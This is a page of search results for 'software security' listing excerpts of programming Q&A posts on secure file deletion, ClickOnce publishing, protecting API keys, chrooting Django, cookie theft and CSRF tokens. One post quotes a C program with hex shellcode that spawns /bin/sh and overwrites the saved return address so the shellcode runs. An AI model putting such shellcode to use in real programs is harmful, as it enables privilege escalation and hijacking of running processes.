Search Results

Search found 30819 results on 1233 pages for 'software security'.

facebook twitter digg google delicious technorati stumbleupon myspace wordpress linkedin gmail igoogle windows live tumblr viadeo yahoo buzz yahoo mail yahoo bookmarks favorites email print

Page 313/1233 | < Previous Page | 309 310 311 312 313 314 315 316 317 318 319 320  | Next Page >

  • Securely erasing a file using simple methods?

    - by Jason
    Hello, I am using C# .NET Framework 2.0. I have a question relating to file shredding. My target operating systems are Windows 7, Windows Vista, and Windows XP. Possibly Windows Server 2003 or 2008 but I'm guessing they should be the same as the first three. My goal is to securely erase a file. I don't believe using File.Delete is secure at all. I read somewhere that the operating system simply marks the raw hard-disk data for deletion when you delete a file - the data is not erased at all. That's why there exists so many working methods to recover supposedly "deleted" files. I also read, that's why it's much more useful to overwrite the file, because then the data on disk actually has to be changed. Is this true? Is this generally what's needed? If so, I believe I can simply write the file full of 1's and 0's a few times. I've read: http://www.codeproject.com/KB/files/NShred.aspx http://blogs.computerworld.com/node/5756 http://blogs.computerworld.com/node/5687 http://stackoverflow.com/questions/4147775/securely-deleting-a-file-in-c-net

    Read the article

  • Unable to create website error (NEW)

    - by salvationishere
    I copied my ClickOnce deployment to my C:/Inetpub/ folder on my webserver and I deleted my Virtual directory. I deleted the WpfApplication1 folder beneath wwwroot in Win Explorer. Then I turned on Web Sharing for this folder. Then I viewed my IIS Manager and this new Share name appeared under wwwroot. So now under Inetpub folder on my web server I have the following directory path: C:\Inetpub\WpfApplication1\ with contents: Application Files publish.htm setup.exe WpfApplication1.application Next, I remapped both the publishing and installation URL's for the project to http://myserver/WpfApplication1/ And I clicked Publish Now. But after I performed a Publish Now operation, I got the following error on my development server (D610-M): Error 1 Failed to connect to 'http://myserver/WpfApplication1/' with the following error: Unable to create the Web site 'http://myserver/WpfApplication1/'. The Web server does not appear to have any authentication methods enabled. It asked for user authentication, but did not send a WWW-Authenticate header. 1 1 WpfApplication1 On my webserver, when I click Browse from the IIS Manager on the WpfApplication1 directory, it shows me the Install page. But after I click the Browse button, it returns an error which says: The remote name could not be resolved: 'd610-m' (D610-M is the name of my development server). How do I fix this?

    Read the article

  • Secure Webservice (WCF) without storing credentials on consumer application

    - by Pai Gaudêncio
    Howdy folks, I have a customer that sells a lottery analysis application. In this application, he consumes a webservice (my service, I mean, belongs to the company I work for now) to get statistical data about lottery results, bets made, amounts, etc., from all across the globe. The access to this webservice is paid, and each consult costs X credits. Some people have disassembled this lottery application and found the api key/auth key used to access the paid webservice, and started to use it. I would like to prevent this from happening again, but I can't find a way to authenticate on the webservice without storing the auth. keys on the application. Does anyone have any ideas on how to accomplish such task? ps1.Can't ask for the users to input any kind of credentials. Has to be transparent for them (they shouldn't know what is happening). ps2. Can't use digital certificates for the same reason above, not to mention it's easy to retrieve them and we would fall into the original problem. Thanks in advance.

    Read the article

  • Bundle a Python app as a single file to support add-ons or extensions?

    - by Brandon Craig Rhodes
    There are several utilities — all with different procedures, limitations, and target operating systems — for getting a Python package and all of its dependencies and turning them into a single binary program that is easy to ship to customers: http://wiki.python.org/moin/Freeze http://www.pyinstaller.org/ http://www.py2exe.org/ http://svn.pythonmac.org/py2app/py2app/trunk/doc/index.html My situation goes one step further: third-party developers will be wanting to write plug-ins, extensions, or add-ons for my application. It is, of course, a daunting question how users on platforms like Windows would most easily install plugins or addons in such a way that my app can easily discover that they have been installed. But beyond that basic question is another: how can a third-party developer bundle their extension with whatever libraries the extension itself needs (which might be binary modules, like lxml) in such a way that the plugin's dependencies become available for import at the same time that the plugin becomes available. How can this be approached? Will my application need its own plug-in area on disk and its own plug-in registry to make this tractable? Or are there general mechanisms, that I could avoid writing myself, that would allow an app that is distributed as a single executable to look around and find plugins that are also installed as single files?

    Read the article

  • How to chroot Django

    - by Brian M. Hunt
    Can one run Django in a chroot? Notably, what's necessary in order to set up (for example) /var/www as a chroot'd directory and then have Django run in that chroot'd directory? Thank you - I'm grateful for any input.

    Read the article

  • can some hacker steal the cookie from a user and login with that name on the web site ?

    - by Aristos
    Reading this question different users get the same cookie value in aspxanonymous and search for a solution, I start thinking, if it is possible for some one to really steal the cookie with some way, and then place it on his browser and login lets say as administrator. Do you know how form authentication can ensure that even if the cookie is stoled, the hacker not actual login using it ? Or do you know any other automatic defense mechanism ? Thank you in advanced.

    Read the article

  • can anyone explain this code to me???

    - by Abed
    //shellcode.c char shellcode[] = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; int main() { int *ret; //ret pointer for manipulating saved return. ret = (int *)&ret + 2; //setret to point to the saved return //value on the stack. (*ret) = (int)shellcode; //change the saved return value to the //address of the shellcode, so it executes. } can anyone give me a better explanation

    Read the article

  • CSRF Protection in AJAX Requests using MVC2

    - by mnemosyn
    The page I'm building depends heavily on AJAX. Basically, there is just one "page" and every data transfer is handled via AJAX. Since overoptimistic caching on the browser side leads to strange problems (data not reloaded), I have to perform all requests (also reads) using POST - that forces a reload. Now I want to prevent the page against CSRF. With form submission, using Html.AntiForgeryToken() works neatly, but in AJAX-request, I guess I will have to append the token manually? Is there anything out-of-the box available? My current attempt looks like this: I'd love to reuse the existing magic. However, HtmlHelper.GetAntiForgeryTokenAndSetCookie is private and I don't want to hack around in MVC. The other option is to write an extension like public static string PlainAntiForgeryToken(this HtmlHelper helper) { // extract the actual field value from the hidden input return helper.AntiForgeryToken().DoSomeHackyStringActions(); } which is somewhat hacky and leaves the bigger problem unsolved: How to verify that token? The default verification implementation is internal and hard-coded against using form fields. I tried to write a slightly modified ValidateAntiForgeryTokenAttribute, but it uses an AntiForgeryDataSerializer which is private and I really didn't want to copy that, too. At this point it seems to be easier to come up with a homegrown solution, but that is really duplicate code. Any suggestions how to do this the smart way? Am I missing something completely obvious?

    Read the article

  • Securing Files over Web: Fine Grained Authorization Based File Access

    - by Nishant
    I have a system where employees can upload files. There are three ways Upload to my account in public, private or protected mode Upload to department account in public, private or protected mode Upload to organization account in public, private or protected mode where public is visible to anyone, private to the group or person only and protected to anyone in the organization. All the files for an organization are stored in a directory say, /files/<organizationId>/, on file server like files +-- 234809 | +img1.jpg | +doc1.pdf +-- 808234 | +doc2.pdf I am storing file-path and privacy level in DB. So, I can control whether to show link to a file URL to an user -- on a given page. The problem is, I do not have any control over file's URL... so, if some one types the URL to img1.jpg in his browser's address bar, there is no way to know whether a logged in user is eligible to see img1.jpg. Any suggestion? Thanks Nishant

    Read the article

  • Empty data problem - data layer or DAL?

    - by luckyluke
    I designing the new App now and giving the following question a lot of thought. I consume a lot of data from the warehouse, and the entities have a lot of dictionary based values (currency, country, tax-whatever data) - dimensions. I cannot be assured though that there won't be nulls. So I am thinking: create an empty value in each of teh dictionaries with special keyID - ie. -1 do the ETL (ssis) do the correct stuff and insert -1 where it needs to let the DAL know that -1 is special (Static const whatever thing) don't care in the code to check for nullness of dictionary entries because THEY will always have a value But maybe I should be thinking: import data AS IS let the DAL do the thinking using empty record Pattern still don't care in the code because business layer will have what it needs from DAL. I think is more of a approach thing but maybe i am missing something important here... What do You think? Am i clear? Please don't confuse it with empty record problem. I do use emptyCustomer think all the time and other defaults too.

    Read the article

  • How secure is WCF wsHttpBinding's Windows authentication?

    - by Akash Kava
    I have created WCF and I have used wsHttpBinding and MTOM as message transport with authentcation as "Windows". Now my service is not current SECURE, its plain HTTP, running on custom port. Is Windows Authentication of WCF's wsHttpBinding secure? can anyone see the password or guess through network trace? Thank you, - Akash

    Read the article

  • Must have tool set for MOSS 2007 development.

    - by Satish
    I'm trying to compile a list of Must have tools/extensions for developing MOSS 2007 to build a dev machine. The dev os is Window 2008 R2 64 bit. MOSS 2007 Visual Studio 2008 Sharepoint Designer WSS/Office Server SDK Visual Studio 2008 Extensions for WSS 3.0 Is there any additional required/nice to have tools?

    Read the article

  • UML Diagrams. When are they used?

    - by user69514
    So ok I understand that UML diagrams help for the construction of a program, but when are they used? Are they needed before you start coding? do you need them so you know what you have to code? Or do you use them after you have coded the program?

    Read the article

  • Pros and cons of programmatically enforcing foreign key than in database

    - by Jeffrey
    It is causing so much trouble in terms of development just by letting database enforcing foreign key. Especially during unit test I can’t drop table due to foreign key constrains, I need to create table in such an order that foreign key constrain warning won’t get triggered. In reality I don’t see too much point of letting database enforcing the foreign key constrains. If the application has been properly designed there should not be any manual database manipulation other than select queries. I just want to make sure that I am not digging myself into a hole by not having foreign key constrains in database and leaving it solely to the application’s responsibility. Am I missing anything? P.S. my real unit tests (not those that use mocking) will drop existing tables if the structure of underlying domain object has been modified.

    Read the article

  • IIS Manager IIS6 Rights Management on Windows Server 2003

    - by Chris
    We are using a dedicated hosting provider to host several of our public websites. There are two development teams/divisions within our company who each maintain public websites on these same servers. Is there a way through ACLs or some sort of rights management (e.g. individual logins) that I would only be able to see and maintain only my public sites and the other development team could only see and maintain their sites? Thanks! Chris

    Read the article

  • Comparison of SSL Certificates

    - by Walley
    My web application most definately needs an SSL certificate I was looking into godaddy's: http://www.godaddy.com/ssl/ssl-certificates.aspx The standard doesn't appear to have the lock in the URL bar, which a lot of users might not consider secure... How true is this? The Standard has https:// obviously in the bar, but is that enough to persuade users to want to enter in confidential information?? I'd appreciate any experience anyone has had with this. or any alterates they've dealt with. Is $100/year really the going rate for an SSL cert that has the lock in the url bar? Thanks SO!

    Read the article

  • NAnt authorization access issue

    - by Luís Custódio
    I'm having a problem trying to move a file through my network, I want to transfer the release from my continuos integration virtual machine to the host of this VM. but i get this: System.UnauthorizedAccessException: Access to the path '\\192.168.0.36\E$\WebApps\MyProgram' is denied. at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath) at System.IO.Directory.InternalCreateDirectory(String fullPath, String path, DirectorySecurity dirSecurity) at System.IO.Directory.CreateDirectory(String path, DirectorySecurity directorySecurity) at NAnt.Core.Tasks.MoveTask.DoFileOperations() at NAnt.Core.Tasks.CopyTask.ExecuteTask() at NAnt.Core.Task.Execute() at NAnt.Core.Target.Execute() at NAnt.Core.Project.Execute(String targetName, Boolean forceDependencies) at NAnt.Core.Project.Execute() at NAnt.Core.Project.Run() I'm trying to transfer from a Windows Server 2003 R2 to a Windows Server 2008 R2.

    Read the article

facebook twitter digg google delicious technorati stumbleupon myspace wordpress linkedin gmail igoogle windows live tumblr viadeo yahoo buzz yahoo mail yahoo bookmarks favorites email print

< Previous Page | 309 310 311 312 313 314 315 316 317 318 319 320  | Next Page >